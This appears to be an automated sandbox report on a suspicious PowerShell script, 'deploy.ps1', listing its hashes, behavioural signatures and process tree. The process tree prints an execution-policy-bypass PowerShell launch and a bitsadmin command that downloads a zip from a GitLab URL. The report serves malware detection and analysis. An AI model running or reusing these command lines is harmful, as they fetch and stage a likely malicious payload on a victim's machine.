Analysis

  • max time kernel
    838s
  • max time network
    839s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-01-2025 10:03

General

  • Target

    deploy.ps1

  • Size

    8KB

  • MD5

    8204fecf61d58baa25cea9e97c894bc3

  • SHA1

    bedf0300880e5f5cdd1643abdff6789ee50db35a

  • SHA256

    0e284d3446eef106b1557f50bbe83bbeda4557476bb88b89fcc01195db83d4b1

  • SHA512

    adc06b854f77734396fefcbc1c319efdb00f30c694a836ce721f5b91364533c410d40c5a07ef68d83d5e5e17c31b074009bc2a2b8823d0c1fd5eb7fbc73c43ea

  • SSDEEP

    96:LmbW8Mf47p7qCgr2CpXlwHZt3pXl4Cj+r1osIPjiTYSKYWrrG8cDd:Lmb4f47VHG2tt4osQe4Yg8J

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\deploy.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2940
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer DownloadJob_268532095 /download /priority normal "https://gitlab.com/pnp30/svn/-/raw/main/deps.zip" "C:\Users\Admin\AppData\Local\Temp\deps.zip"
      2⤵
      • Download via BitsAdmin
      PID:2420

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2940-4-0x000007FEF5C8E000-0x000007FEF5C8F000-memory.dmp

    Filesize

    4KB

  • memory/2940-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2940-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

    Filesize

    32KB

  • memory/2940-7-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

  • memory/2940-8-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

  • memory/2940-9-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

  • memory/2940-10-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

  • memory/2940-11-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

  • memory/2940-12-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB